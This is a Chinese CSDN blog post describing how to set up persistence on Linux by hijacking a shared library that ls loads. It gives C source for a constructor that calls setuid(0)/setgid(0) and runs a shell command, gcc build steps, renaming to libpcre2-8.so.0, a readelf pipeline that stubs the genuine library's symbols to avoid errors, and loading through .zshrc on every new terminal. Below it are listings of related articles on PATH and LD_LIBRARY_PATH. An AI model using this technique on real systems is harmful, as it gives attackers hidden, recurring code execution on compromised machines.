以 ls 为例制作 LD_LIBRARY_PATH 权限维持

最新推荐文章于 2024-11-04 12:30:03 发布
最新推荐文章于 2024-11-04 12:30:03 发布
阅读量374 收藏 7
点赞数 6
文章标签: linux java 运维 信息安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yutianovo/article/details/136332621
版权
本文介绍了如何在.zshrc文件中使用C语言的构造函数`hijack`实现代码注入,通过设置uid和gid以及动态链接库的方法,使得每次新开终端时都会执行特定的系统操作。后续步骤涉及修改so文件和编译过程以确保代码正常运行。
摘要由CSDN通过智能技术生成

以 ls 为例做实验

.zshrc 每打开一个终端就会执行,将下面的内容写入到 .zshrc 中。

编译此代码

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h> // for setuid/setgid

static void hijack() __attribute__((constructor));
void hijack() {

	setuid(0);
	setgid(0);
	printf("HIJACKING...\n");
	system("touch /tmp/hijack1");
}


gcc -Wall -fPIC -c -o hijack.o hijack.c
gcc -shared -o hijack.so hijack.o
mv hijack.so libpcre2-8.so.0

此时新建一个终端会报错

为了使 so 文件中的代码正常执行。
只需要将 readelf -s --wide /lib/x86_64-linux-gnu/libpcre2-8.so.0 | grep pcre2_ | awk '{print $8}' | sed 's/^/int /' | sed 's/$/;/' 结果复制到 hijack.c 中,再次编译。

此时在打开一个新的终端就会执行 so 中的代码。

赛博雨天
关注
LinuxPATHLD_LIBRARY_PATH的区别
littlemichelle
06-27 1156
目的PATH用于查找可执行文件,而用于查找动态链接库。影响对象PATH影响命令的查找和执行,影响程序运行时动态库的查找和加载。使用场景PATH更多地关注于用户和系统的交互,即如何快速找到并执行用户请求的命令;更多地关注于程序的运行时环境,即程序运行时如何找到它需要的动态链接库。了解这两个环境变量的区别对于有效地配置和管理Linux和类Unix操作系统的环境非常重要,可以帮助确保命令和程序能够正确地找到它们需要的资源。总的来说,.so。
LinuxPATHLIBRARY_PATHLD_LIBRARY_PATH的区别
泠山的博客
01-25 837
的缩写,指的是动态链接器或动态加载器,它负责在程序运行时加载共享库(动态库)。在 Unix 和 Linux 系统中,动态链接器通常是 ld.so 或 ld-linux.so。等等,都是系统通过 PATH 找到了这个命令执行文件的所在位置,再运行这条命令(可执行文件)。有效期限:临时改变,只能在当前的终端窗口中有效,当前窗口关闭后就会恢复原有的 PATH 配置。查找ELF可执行文件运行时所依赖的动态库(so)的路径。,指定除了系统默认路径(/usr/lib)之外的路径。,即可对所有用户生效。
LD_LIBRARY_PATH详解
热门推荐
yueyecheshou1980的博客
05-13 4万+
LD_LIBRARY_PATH详解 LD_LIBRARY_PATHLinux环境变量名,该环境变量主要用于指定查找共享库(动态链接库)时除了默认路径之外的其他路径。 非常多的软件没有root权限安装会比较困难,主要就是因为各种系统库文件,也就是LD_LIBRARY_PATH这个环境变量里面的文件。比如前面我提到的lancet软件需要的库文件如下: -llzma -lbz2 -lz -ldl -lpthread -lcurl -lcrypto -lbamtools 可以使用 ls /usr/lib |gr
常用的环境变量PATH,LD_LIBRARY_PATH,LIBRARY_PATH
idealcitier's Daily life
12-08 557
PATH,LD_LIBRARY_PATH,LIBRARY_PATH环境变量经常使用,但经常忘记,遂记录下。
PATH linux环境变量 LD_LIBRARY_PATH详解
运动的肉肉子的博客
03-20 6525
LD_LIBRARY_PATH详解 LD_LIBRARY_PATHLinux环境变量名,该环境变量主要用于指定查找共享库(动态链接库)时除了默认路径之外的其他路径。 非常多的软件没有root权限安装会比较困难,主要就是因为各种系统库文件,也就是LD_LIBRARY_PATH这个环境变量里面的文件。比如前面我提到的lancet软件需要的库文件如下: -llzma -lbz2 -lz -ld...
linux应用开发 | LD_LIBRARY_PATH
myWorld001的博客
10-11 1354
含义 LD_LIBRARY_PATHLinux环境变量名,该环境变量主要用于指定查找共享库(动态链接库)时除了默认路径之外的其他路径。 共享库默认路径 ls /usr/lib |grep lib 当执行函数动态链接.so时,如果从文件不在缺省目录’/lib’and’/usr/lib’。那么就需要指定环境变量LD_LIBRARY_PATH。 echo $LD_LIBRARY_PATH 假如现在需要在已有的环境变量上添加新的路径名,在linux下可以采用export命令来设置这个值,在终端输入: expo
LD_LIBRARY_PATH 修改后导致段错误不可以用
zhuiyunzhugang的博客
07-03 938
“” 设置 export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/the/path/you/want/set export LD_LIBRARY_PATH=/the/path/you/want/set “” 查看设置 echo $LD_LIBRARY_PATH “” 清除 unset LD_LIBRARY_PATH
Linux中的环境变量PATHLIBRARY_PATHLD_LIBRARY_PATH
P19777的博客
01-17 817
PATH PATH是可执行文件路径,是三个中我们最常接触到的,因为我们命令行中的每句能运行的命令,如ls、top、ps等,都是系统通过PATH找到了这个命令执行文件的所在位置,再run这个命令(可执行文件)。 实验:执行echo $PATH能看到当前环境的PATH都配置哪些路径,下面是我的环境中的PATH,其中配置的有java环境 PATH配置起来也略简单。 比如说,在用户的目录下有一...
Linux】19.Linux环境变量名LD_LIBRARY_PATHldd命令详解
u011754972的博客
04-25 2615
Linux环境变量名LD_LIBRARY_PATHldd命令详解 参考链接: https://www.jianshu.com/p/a62e1d327023 LD_LIBRARY_PATH中的LD是指的LOAD LD_LIBRARY_PATHLinux环境变量名,该环境变量主要用于指定查找共享库(动态链接库)时除了默认路径之外的其他路径。 可以使用 ls /usr/lib |grep lib 查看自己是否有需要的库文件,当然还需查看其它库文件目录:echo $LD_LIBRARY_PATH 里面一般可
LinuxPATHLIBRARY_PATHLD_LIBRARY_PATH简单说明
Mr_yangsc的博客
06-05 1306
本文主要描述关于LinuxPATHLIBRARY_PATHLD_LIBRARY_PATH的简单说明
如何检查LD_LIBRARY_PATH环境变量
02-02
ls -d $LD_LIBRARY_PATH/* 2>/dev/null ``` 这将列出LD_LIBRARY_PATH中的每个路径,并且只显示存在的路径。如果路径不存在,将不会显示任何输出。 5. 如果需要添加或修改LD_LIBRARY_PATH变量,可以使用export命令...
关于pkg-config与LD_LIBRARY_PATH与/etc/ld.so.conf文件的区别与作用
StrugglePeach的专栏
11-17 1603
Linux 共享库  Linux 系统上有两类根本不同的 Linux 可执行程序。1. 第一类是静态链接的可执行程序。  静态可执行程序包含执行所需的所有函数。因为这一原因,静态可执行程序不依赖任何外部库就可以运行。2. 第二类是动态链接的可执行程序。动态库是程序在 关于动态库设置的问题通过源码包安装程序时,主要用到了“三大步”策略:configure、make和make install 。在安装
python 设置LD_LIBRARY_PATH 报错
07-28
export LD_LIBRARY_PATH=/path/to/library:$LD_LIBRARY_PATH ``` 或者在 Python 脚本中使用 `os.environ` 来动态设置: ```python import os os.environ['LD_LIBRARY_PATH'] = '/path/to/library:' + os....
动态库,静态库,LD_LIBRARY_PATH,LIBRARY_PATH,-L,-l
凉秋银杏叶
01-02 3471
我们通常把一些公用函数制作成函数库,供其它程序使用。函数库分为静态库和动态库两种。 LIBRARY_PATHLD_LIBRARY_PATHLinux下的两个环境变量,二者的含义和作用
第一章 Linux安装 -- 安装Rocky Linux 9操作系统(二)
Raymond的博客
10-30 97
在分区之前,这里需要简单介绍一下磁盘分区的相关知识,以便于大家更好地理解学习。1)磁盘在使用之前一般要先分区(相当于买了房要分几居一样)。2)磁盘分区有主分区、扩展分区和逻辑分区之分。一块磁盘最多可以拥有4个主分区,其中,一个主分区的位置可以用一个扩展分区来替换,在这个扩展分区内可以划分多个逻辑分区。3)如果规划的分区数量超过4个,则分区组合可为3 prmary(p)+1 extend(e)或2p+1e或1p+1e。
Linux】MySQLMGR主从复制
Stringzhua的博客
10-30 899
MySQL是⽬前最流⾏的开源关系型数据库,国内⾦融⾏业也开始全⾯使⽤,其中MySQL5.7.17提出的 MGR(MySQL Group Replication)既可以很好的保证数据⼀致性⼜可以⾃动切换,具备故障检测功能、 ⽀持多节点写⼊,MGR是⼀项被普遍看好的技术。MGR(MySQL Group Replication)是MVSQL⾃带的⼀个插件,可以灵活部署。
Linux初阶——线程(Part3):POSIX 信号量 & CP 模型变体
m0_73093743的博客
11-02 434
只能建立一个对象的设计模式。
[linux 驱动]PWM子系统详解
最新发布
weixin_49406449的博客
11-04 488
搜索“rockchip,rk3328-pwm”,发现在./drivers/pwm/pwm-rockchip.c 出现,所以 pwm6 的驱动是pwm-rockchip。任何 PWM 设备实例都可以被注册到 pwm_class 下,用户空间应用可以通过 /sys/class/pwm 访问这些设备,实现对 PWM 功能的控制。struct pwm_device *pwm: 这是指向 PWM 设备结构体的指针,该结构体是在调用 pwm_request 函数时获取的。这是指向该控制器的 PWM 通道的数组或链表。
Linux tac命令‌
weixin_37788102的博客
10-30 346
tac命令实际上是cat命令的一个变体,尽管它的功能相对简单,但在某些情况下非常有用。例如,当需要查看文件的最后一行(通常是标题或总结)时,使用tac命令可以避免滚动查看整个文件。此外,tac命令对于处理大型文件或需要快速定位文件末尾内容的情况非常有用‌。‌Linux tac命令‌是一个用于逆序显示文件内容的工具,其名称来源于“cat”的反向拼写。tac命令的基本功能是将文件的内容从最后一行开始输出,直到第一行结束,这与cat命令的功能相反,cat命令是从第一行开始输出直到最后一行。tac命令的基本用法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值